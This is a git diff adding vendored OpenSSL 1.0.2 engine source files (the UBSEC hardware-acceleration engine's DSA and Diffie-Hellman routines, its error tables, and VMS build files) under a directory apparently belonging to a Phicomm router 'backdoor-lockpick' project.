+        goto err;
+    }
+
+    if (p_UBSEC_dsa_sign_ioctl(fd,
+                               /* compute hash before signing */
+                               0, (unsigned char *)dgst, d_len, NULL,
+                               /* compute random value */
+                               0,
+                               (unsigned char *)dsa->p->d,
+                               BN_num_bits(dsa->p),
+                               (unsigned char *)dsa->q->d,
+                               BN_num_bits(dsa->q),
+                               (unsigned char *)dsa->g->d,
+                               BN_num_bits(dsa->g),
+                               (unsigned char *)dsa->priv_key->d,
+                               BN_num_bits(dsa->priv_key),
+                               (unsigned char *)r->d, &r_len,
+                               (unsigned char *)s->d, &s_len) != 0) {
+        const DSA_METHOD *meth;
+
+        UBSECerr(UBSEC_F_UBSEC_DSA_DO_SIGN, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+        meth = DSA_OpenSSL();
+        to_return = meth->dsa_do_sign(dgst, dlen, dsa);
+
+        goto err;
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    r->top = (160 + BN_BITS2 - 1) / BN_BITS2;
+    s->top = (160 + BN_BITS2 - 1) / BN_BITS2;
+
+    to_return = DSA_SIG_new();
+    if (to_return == NULL) {
+        UBSECerr(UBSEC_F_UBSEC_DSA_DO_SIGN, UBSEC_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    to_return->r = r;
+    to_return->s = s;
+
+ err:
+    if (!to_return) {
+        if (r)
+            BN_free(r);
+        if (s)
+            BN_free(s);
+    }
+    BN_clear_free(&m);
+    return to_return;
+}
+
+static int ubsec_dsa_verify(const unsigned char *dgst, int dgst_len,
+                            DSA_SIG *sig, DSA *dsa)
+{
+    int v_len, d_len;
+    int to_return = 0;
+    int fd;
+    BIGNUM v, *pv = &v;
+
+    BN_init(&v);
+
+    if (!bn_wexpand(pv, dsa->p->top)) {
+        UBSECerr(UBSEC_F_UBSEC_DSA_VERIFY, UBSEC_R_BN_EXPAND_FAIL);
+        goto err;
+    }
+
+    v_len = BN_num_bits(dsa->p);
+
+    d_len = p_UBSEC_ubsec_bytes_to_bits((unsigned char *)dgst, dgst_len);
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        const DSA_METHOD *meth;
+        fd = 0;
+        UBSECerr(UBSEC_F_UBSEC_DSA_VERIFY, UBSEC_R_UNIT_FAILURE);
+        meth = DSA_OpenSSL();
+        to_return = meth->dsa_do_verify(dgst, dgst_len, sig, dsa);
+        goto err;
+    }
+
+    if (p_UBSEC_dsa_verify_ioctl(fd, 0, /* compute hash before signing */
+                                 (unsigned char *)dgst, d_len,
+                                 (unsigned char *)dsa->p->d,
+                                 BN_num_bits(dsa->p),
+                                 (unsigned char *)dsa->q->d,
+                                 BN_num_bits(dsa->q),
+                                 (unsigned char *)dsa->g->d,
+                                 BN_num_bits(dsa->g),
+                                 (unsigned char *)dsa->pub_key->d,
+                                 BN_num_bits(dsa->pub_key),
+                                 (unsigned char *)sig->r->d,
+                                 BN_num_bits(sig->r),
+                                 (unsigned char *)sig->s->d,
+                                 BN_num_bits(sig->s), (unsigned char *)v.d,
+                                 &v_len) != 0) {
+        const DSA_METHOD *meth;
+        UBSECerr(UBSEC_F_UBSEC_DSA_VERIFY, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+
+        meth = DSA_OpenSSL();
+        to_return = meth->dsa_do_verify(dgst, dgst_len, sig, dsa);
+
+        goto err;
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    to_return = 1;
+ err:
+    BN_clear_free(&v);
+    return to_return;
+}
+#  endif
+
+#  ifndef OPENSSL_NO_DH
+static int ubsec_dh_compute_key(unsigned char *key, const BIGNUM *pub_key,
+                                DH *dh)
+{
+    int ret = -1, k_len, fd;
+
+    k_len = BN_num_bits(dh->p);
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        const DH_METHOD *meth;
+        UBSECerr(UBSEC_F_UBSEC_DH_COMPUTE_KEY, UBSEC_R_UNIT_FAILURE);
+        meth = DH_OpenSSL();
+        ret = meth->compute_key(key, pub_key, dh);
+        goto err;
+    }
+
+    if (p_UBSEC_diffie_hellman_agree_ioctl(fd,
+                                           (unsigned char *)dh->priv_key->d,
+                                           BN_num_bits(dh->priv_key),
+                                           (unsigned char *)pub_key->d,
+                                           BN_num_bits(pub_key),
+                                           (unsigned char *)dh->p->d,
+                                           BN_num_bits(dh->p), key,
+                                           &k_len) != 0) {
+        /* Hardware's a no go, failover to software */
+        const DH_METHOD *meth;
+        UBSECerr(UBSEC_F_UBSEC_DH_COMPUTE_KEY, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+
+        meth = DH_OpenSSL();
+        ret = meth->compute_key(key, pub_key, dh);
+
+        goto err;
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    ret = p_UBSEC_ubsec_bits_to_bytes(k_len);
+ err:
+    return ret;
+}
+
+static int ubsec_dh_generate_key(DH *dh)
+{
+    int ret = 0, random_bits = 0, pub_key_len = 0, priv_key_len = 0, fd;
+    BIGNUM *pub_key = NULL;
+    BIGNUM *priv_key = NULL;
+
+    /*
+     *  How many bits should Random x be? dh_key.c
+     *  sets the range from 0 to num_bits(modulus) ???
+     */
+
+    if (dh->priv_key == NULL) {
+        priv_key = BN_new();
+        if (priv_key == NULL)
+            goto err;
+        priv_key_len = BN_num_bits(dh->p);
+        if (bn_wexpand(priv_key, dh->p->top) == NULL)
+            goto err;
+        do
+            if (!BN_rand_range(priv_key, dh->p))
+                goto err;
+        while (BN_is_zero(priv_key)) ;
+        random_bits = BN_num_bits(priv_key);
+    } else {
+        priv_key = dh->priv_key;
+    }
+
+    if (dh->pub_key == NULL) {
+        pub_key = BN_new();
+        pub_key_len = BN_num_bits(dh->p);
+        if (bn_wexpand(pub_key, dh->p->top) == NULL)
+            goto err;
+        if (pub_key == NULL)
+            goto err;
+    } else {
+        pub_key = dh->pub_key;
+    }
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        const DH_METHOD *meth;
+        UBSECerr(UBSEC_F_UBSEC_DH_GENERATE_KEY, UBSEC_R_UNIT_FAILURE);
+        meth = DH_OpenSSL();
+        ret = meth->generate_key(dh);
+        goto err;
+    }
+
+    if (p_UBSEC_diffie_hellman_generate_ioctl(fd,
+                                              (unsigned char *)priv_key->d,
+                                              &priv_key_len,
+                                              (unsigned char *)pub_key->d,
+                                              &pub_key_len,
+                                              (unsigned char *)dh->g->d,
+                                              BN_num_bits(dh->g),
+                                              (unsigned char *)dh->p->d,
+                                              BN_num_bits(dh->p), 0, 0,
+                                              random_bits) != 0) {
+        /* Hardware's a no go, failover to software */
+        const DH_METHOD *meth;
+
+        UBSECerr(UBSEC_F_UBSEC_DH_GENERATE_KEY, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+
+        meth = DH_OpenSSL();
+        ret = meth->generate_key(dh);
+
+        goto err;
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    dh->pub_key = pub_key;
+    dh->pub_key->top = (pub_key_len + BN_BITS2 - 1) / BN_BITS2;
+    dh->priv_key = priv_key;
+    dh->priv_key->top = (priv_key_len + BN_BITS2 - 1) / BN_BITS2;
+
+    ret = 1;
+ err:
+    return ret;
+}
+#  endif
+
+#  ifdef NOT_USED
+static int ubsec_rand_bytes(unsigned char *buf, int num)
+{
+    int ret = 0, fd;
+
+    if ((fd = p_UBSEC_ubsec_open(UBSEC_KEY_DEVICE_NAME)) <= 0) {
+        const RAND_METHOD *meth;
+        UBSECerr(UBSEC_F_UBSEC_RAND_BYTES, UBSEC_R_UNIT_FAILURE);
+        num = p_UBSEC_ubsec_bits_to_bytes(num);
+        meth = RAND_SSLeay();
+        meth->seed(buf, num);
+        ret = meth->bytes(buf, num);
+        goto err;
+    }
+
+    num *= 8;                   /* bytes to bits */
+
+    if (p_UBSEC_rng_ioctl(fd, UBSEC_RNG_DIRECT, buf, &num) != 0) {
+        /* Hardware's a no go, failover to software */
+        const RAND_METHOD *meth;
+
+        UBSECerr(UBSEC_F_UBSEC_RAND_BYTES, UBSEC_R_REQUEST_FAILED);
+        p_UBSEC_ubsec_close(fd);
+
+        num = p_UBSEC_ubsec_bits_to_bytes(num);
+        meth = RAND_SSLeay();
+        meth->seed(buf, num);
+        ret = meth->bytes(buf, num);
+
+        goto err;
+    }
+
+    p_UBSEC_ubsec_close(fd);
+
+    ret = 1;
+ err:
+    return (ret);
+}
+
+static int ubsec_rand_status(void)
+{
+    return 0;
+}
+#  endif
+
+/*
+ * This stuff is needed if this ENGINE is being compiled into a
+ * self-contained shared-library.
+ */
+#  ifndef OPENSSL_NO_DYNAMIC_ENGINE
+static int bind_fn(ENGINE *e, const char *id)
+{
+    if (id && (strcmp(id, engine_ubsec_id) != 0))
+        return 0;
+    if (!bind_helper(e))
+        return 0;
+    return 1;
+}
+
+IMPLEMENT_DYNAMIC_CHECK_FN()
+    IMPLEMENT_DYNAMIC_BIND_FN(bind_fn)
+#  endif                        /* OPENSSL_NO_DYNAMIC_ENGINE */
+# endif                         /* !OPENSSL_NO_HW_UBSEC */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec.ec
new file mode 100644
index 0000000..99b9233
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec.ec
@@ -0,0 +1 @@
+L UBSEC		e_ubsec_err.h			e_ubsec_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec_err.c
new file mode 100644
index 0000000..fefc5b0
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec_err.c
@@ -0,0 +1,154 @@
+/* e_ubsec_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_ubsec_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA UBSEC_str_functs[] = {
+    {ERR_FUNC(UBSEC_F_UBSEC_CTRL), "UBSEC_CTRL"},
+    {ERR_FUNC(UBSEC_F_UBSEC_DH_COMPUTE_KEY), "UBSEC_DH_COMPUTE_KEY"},
+    {ERR_FUNC(UBSEC_F_UBSEC_DH_GENERATE_KEY), "UBSEC_DH_GENERATE_KEY"},
+    {ERR_FUNC(UBSEC_F_UBSEC_DSA_DO_SIGN), "UBSEC_DSA_DO_SIGN"},
+    {ERR_FUNC(UBSEC_F_UBSEC_DSA_VERIFY), "UBSEC_DSA_VERIFY"},
+    {ERR_FUNC(UBSEC_F_UBSEC_FINISH), "UBSEC_FINISH"},
+    {ERR_FUNC(UBSEC_F_UBSEC_INIT), "UBSEC_INIT"},
+    {ERR_FUNC(UBSEC_F_UBSEC_MOD_EXP), "UBSEC_MOD_EXP"},
+    {ERR_FUNC(UBSEC_F_UBSEC_MOD_EXP_CRT), "UBSEC_MOD_EXP_CRT"},
+    {ERR_FUNC(UBSEC_F_UBSEC_RAND_BYTES), "UBSEC_RAND_BYTES"},
+    {ERR_FUNC(UBSEC_F_UBSEC_RSA_MOD_EXP), "UBSEC_RSA_MOD_EXP"},
+    {ERR_FUNC(UBSEC_F_UBSEC_RSA_MOD_EXP_CRT), "UBSEC_RSA_MOD_EXP_CRT"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA UBSEC_str_reasons[] = {
+    {ERR_REASON(UBSEC_R_ALREADY_LOADED), "already loaded"},
+    {ERR_REASON(UBSEC_R_BN_EXPAND_FAIL), "bn expand fail"},
+    {ERR_REASON(UBSEC_R_CTRL_COMMAND_NOT_IMPLEMENTED),
+     "ctrl command not implemented"},
+    {ERR_REASON(UBSEC_R_DSO_FAILURE), "dso failure"},
+    {ERR_REASON(UBSEC_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {ERR_REASON(UBSEC_R_NOT_LOADED), "not loaded"},
+    {ERR_REASON(UBSEC_R_REQUEST_FAILED), "request failed"},
+    {ERR_REASON(UBSEC_R_SIZE_TOO_LARGE_OR_TOO_SMALL),
+     "size too large or too small"},
+    {ERR_REASON(UBSEC_R_UNIT_FAILURE), "unit failure"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef UBSEC_LIB_NAME
+static ERR_STRING_DATA UBSEC_lib_name[] = {
+    {0, UBSEC_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int UBSEC_lib_error_code = 0;
+static int UBSEC_error_init = 1;
+
+static void ERR_load_UBSEC_strings(void)
+{
+    if (UBSEC_lib_error_code == 0)
+        UBSEC_lib_error_code = ERR_get_next_error_library();
+
+    if (UBSEC_error_init) {
+        UBSEC_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(UBSEC_lib_error_code, UBSEC_str_functs);
+        ERR_load_strings(UBSEC_lib_error_code, UBSEC_str_reasons);
+#endif
+
+#ifdef UBSEC_LIB_NAME
+        UBSEC_lib_name->error = ERR_PACK(UBSEC_lib_error_code, 0, 0);
+        ERR_load_strings(0, UBSEC_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_UBSEC_strings(void)
+{
+    if (UBSEC_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(UBSEC_lib_error_code, UBSEC_str_functs);
+        ERR_unload_strings(UBSEC_lib_error_code, UBSEC_str_reasons);
+#endif
+
+#ifdef UBSEC_LIB_NAME
+        ERR_unload_strings(0, UBSEC_lib_name);
+#endif
+        UBSEC_error_init = 1;
+    }
+}
+
+static void ERR_UBSEC_error(int function, int reason, char *file, int line)
+{
+    if (UBSEC_lib_error_code == 0)
+        UBSEC_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(UBSEC_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec_err.h
new file mode 100644
index 0000000..c8aec7c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec_err.h
@@ -0,0 +1,102 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_UBSEC_ERR_H
+# define HEADER_UBSEC_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_UBSEC_strings(void);
+static void ERR_unload_UBSEC_strings(void);
+static void ERR_UBSEC_error(int function, int reason, char *file, int line);
+# define UBSECerr(f,r) ERR_UBSEC_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the UBSEC functions. */
+
+/* Function codes. */
+# define UBSEC_F_UBSEC_CTRL                               100
+# define UBSEC_F_UBSEC_DH_COMPUTE_KEY                     101
+# define UBSEC_F_UBSEC_DH_GENERATE_KEY                    111
+# define UBSEC_F_UBSEC_DSA_DO_SIGN                        102
+# define UBSEC_F_UBSEC_DSA_VERIFY                         103
+# define UBSEC_F_UBSEC_FINISH                             104
+# define UBSEC_F_UBSEC_INIT                               105
+# define UBSEC_F_UBSEC_MOD_EXP                            106
+# define UBSEC_F_UBSEC_MOD_EXP_CRT                        110
+# define UBSEC_F_UBSEC_RAND_BYTES                         107
+# define UBSEC_F_UBSEC_RSA_MOD_EXP                        108
+# define UBSEC_F_UBSEC_RSA_MOD_EXP_CRT                    109
+
+/* Reason codes. */
+# define UBSEC_R_ALREADY_LOADED                           100
+# define UBSEC_R_BN_EXPAND_FAIL                           101
+# define UBSEC_R_CTRL_COMMAND_NOT_IMPLEMENTED             102
+# define UBSEC_R_DSO_FAILURE                              103
+# define UBSEC_R_MISSING_KEY_COMPONENTS                   104
+# define UBSEC_R_NOT_LOADED                               105
+# define UBSEC_R_REQUEST_FAILED                           106
+# define UBSEC_R_SIZE_TOO_LARGE_OR_TOO_SMALL              107
+# define UBSEC_R_UNIT_FAILURE                             108
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/engine_vector.mar b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/engine_vector.mar
new file mode 100644
index 0000000..7d968e7
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/engine_vector.mar
@@ -0,0 +1,24 @@
+;
+; Transfer vector for VAX shareable image
+;
+	.TITLE ENGINE
+	.IDENT /ENGINE/
+;
+; Define macro to assist in building transfer vector entries.  Each entry
+; should take no more than 8 bytes.
+;
+	.MACRO FTRANSFER_ENTRY routine
+	.ALIGN QUAD
+	.TRANSFER routine
+	.MASK	routine
+	JMP	routine+2
+	.ENDM FTRANSFER_ENTRY
+;
+; Place entries in own program section.
+;
+	.PSECT $$ENGINE,QUAD,PIC,USR,CON,REL,LCL,SHR,EXE,RD,NOWRT
+ENGINE_xfer:
+	FTRANSFER_ENTRY bind_engine
+	FTRANSFER_ENTRY v_check
+	.BLKB 32768-<.-ENGINE_xfer>	; 64 pages total.
+	.END
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ia64.opt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ia64.opt
new file mode 100644
index 0000000..1dc71bf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/ia64.opt
@@ -0,0 +1 @@
+SYMBOL_VECTOR=(bind_engine=PROCEDURE,v_check=PROCEDURE)
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/makeengines.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/makeengines.com
new file mode 100644
index 0000000..fd8bca9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/makeengines.com
@@ -0,0 +1,1140 @@
+$!
+$!  MAKEENGINES.COM
+$!  Written By:  Richard Levitte
+$!               richard@levitte.org
+$!
+$!  This command file compiles and creates the various engines in form
+$!  of shared images.  They are placed in [.xxx.EXE.ENGINES], where "xxx"
+$!  is ALPHA, IA64 or VAX, depending on your hardware.
+$!
+$!  P1	if this is ENGINES or ALL, the engines will build, otherwise not.
+$!
+$!  P2	DEBUG or NODEBUG to compile with or without debugger information.
+$!
+$!  P3  VAXC		for VAX C
+$!	DECC		for DEC C
+$!	GNUC		for GNU C (untested)
+$!
+$!  P4	if defined, sets the TCP/IP libraries to use.  UCX or TCPIP is
+$!	used by default since most other implementations come with a
+$!	compatibility library.  The value must be one of the following:
+$!
+$!	UCX		for UCX
+$!	SOCKETSHR	for SOCKETSHR+NETLIB
+$!	TCPIP		for TCPIP (post UCX)
+$!
+$!  P5	if defined, tells the compiler not to use special threads.
+$!
+$!  P6	if defined, denotes which engines to build.  If not defined,
+$!	all available engines are built.
+$!
+$!  P7, if defined, specifies the C pointer size.  Ignored on VAX.
+$!      ("64=ARGV" gives more efficient code with HP C V7.3 or newer.)
+$!      Supported values are:
+$!
+$!	""	Compile with default (/NOPOINTER_SIZE)
+$!	32	Compile with /POINTER_SIZE=32 (SHORT)
+$!	64	Compile with /POINTER_SIZE=64[=ARGV] (LONG[=ARGV])
+$!               (Automatically select ARGV if compiler supports it.)
+$!      64=      Compile with /POINTER_SIZE=64 (LONG).
+$!      64=ARGV  Compile with /POINTER_SIZE=64=ARGV (LONG=ARGV).
+$!
+$!  P8, if defined, specifies a directory where ZLIB files (zlib.h,
+$!  libz.olb) may be found.  Optionally, a non-default object library
+$!  name may be included ("dev:[dir]libz_64.olb", for example).
+$!
+$!-----------------------------------------------------------------------------
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ on control_c then goto exit
+$!
+$! Set the default TCP/IP library to link against if needed
+$!
+$ TCPIP_LIB = ""
+$ ZLIB_LIB = ""
+$!
+$! Check What Architecture We Are Using.
+$!
+$ IF (F$GETSYI("CPU").LT.128)
+$ THEN
+$!
+$!  The Architecture Is VAX.
+$!
+$   ARCH = "VAX"
+$!
+$! Else...
+$!
+$ ELSE
+$!
+$!  The Architecture Is Alpha, IA64 or whatever comes in the future.
+$!
+$   ARCH = F$EDIT( F$GETSYI( "ARCH_NAME"), "UPCASE")
+$   IF (ARCH .EQS. "") THEN ARCH = "UNK"
+$!
+$! End The Architecture Check.
+$!
+$ ENDIF
+$!
+$ ARCHD = ARCH
+$ LIB32 = "32"
+$ OPT_FILE = ""
+$ POINTER_SIZE = ""
+$!
+$! Set the names of the engines we want to build
+$! NOTE: Some might think this list ugly.  However, it's made this way to
+$! reflect the LIBNAMES variable in Makefile as closely as possible,
+$! thereby making it fairly easy to verify that the lists are the same.
+$! NOTE: gmp isn't built, as it's mostly a test engine and brings in another
+$! library that isn't necessarely ported to VMS.
+$!
+$ ENGINES = "," + P6
+$ IF ENGINES .EQS. "," THEN -
+	ENGINES = ",4758cca,aep,atalla,cswift,chil,nuron,sureware,ubsec,padlock,"
+$!
+$! GOST requires a 64-bit integer type, unavailable on VAX.
+$!
+$ IF (ARCH .NES. "VAX") THEN -
+       ENGINES = ENGINES+ ",ccgost"
+$!
+$! Check options.
+$!
+$ OPT_PHASE = P1
+$ ACCEPT_PHASE = "ALL,ENGINES"
+$ OPT_DEBUG = P2
+$ OPT_COMPILER = P3
+$ OPT_TCPIP_LIB = P4
+$ OPT_SPECIAL_THREADS = P5
+$ OPT_POINTER_SIZE = P7
+$ ZLIB = P8
+$
+$ GOSUB CHECK_OPTIONS
+$!
+$! Set the goal directories, and create them if necessary
+$!
+$ OBJ_DIR := SYS$DISK:[-.'ARCHD'.OBJ.ENGINES]
+$ EXE_DIR := SYS$DISK:[-.'ARCHD'.EXE.ENGINES]
+$ IF F$PARSE(OBJ_DIR) .EQS. "" THEN CREATE/DIRECTORY 'OBJ_DIR'
+$ IF F$PARSE(EXE_DIR) .EQS. "" THEN CREATE/DIRECTORY 'EXE_DIR'
+$!
+$! Set the goal files, and create them if necessary
+$!
+$ CRYPTO_LIB := SYS$DISK:[-.'ARCHD'.EXE.CRYPTO]SSL_LIBCRYPTO'LIB32'.OLB
+$ IF F$SEARCH(CRYPTO_LIB) .EQS. "" THEN LIBRARY/CREATE/OBJECT 'CRYPTO_LIB'
+$!
+$! Specify the destination directory in any /MAP option.
+$!
+$ if (LINKMAP .eqs. "MAP")
+$ then
+$   LINKMAP = LINKMAP+ "=''EXE_DIR'"
+$ endif
+$!
+$! Add the location prefix to the linker options file name.
+$!
+$ if (OPT_FILE .nes. "")
+$ then
+$   OPT_FILE = EXE_DIR+ OPT_FILE
+$ endif
+$!
+$! Initialise.
+$!
+$ GOSUB INITIALISE
+$ GOSUB CHECK_OPT_FILE
+$!
+$! Define what goes into each engine.  VAX includes a transfer vector.
+$!
+$ ENGINE_ = ""
+$ TV_OBJ = ""
+$ IF ARCH .EQS. "VAX"
+$ THEN
+$   ENGINE_ = "engine_vector.mar"
+$   TV_OBJ_NAME = OBJ_DIR + F$PARSE(ENGINE_,,,"NAME","SYNTAX_ONLY") + ".OBJ"
+$   TV_OBJ = ",''TV_OBJ_NAME'"
+$ ENDIF
+$ ENGINE_4758cca = "e_4758cca"
+$ ENGINE_aep = "e_aep"
+$ ENGINE_atalla = "e_atalla"
+$ ENGINE_cswift = "e_cswift"
+$ ENGINE_chil = "e_chil"
+$ ENGINE_nuron = "e_nuron"
+$ ENGINE_sureware = "e_sureware"
+$ ENGINE_ubsec = "e_ubsec"
+$ ENGINE_padlock = "e_padlock"
+$
+$ ENGINE_ccgost_SUBDIR = "ccgost"
+$ ENGINE_ccgost = "e_gost_err,gost2001_keyx,gost2001,gost89,gost94_keyx,"+ -
+		  "gost_ameth,gost_asn1,gost_crypt,gost_ctl,gost_eng,"+ -
+		  "gosthash,gost_keywrap,gost_md,gost_params,gost_pmeth,"+ -
+		  "gost_sign"
+$!
+$! Define which programs need to be linked with a TCP/IP library
+$!
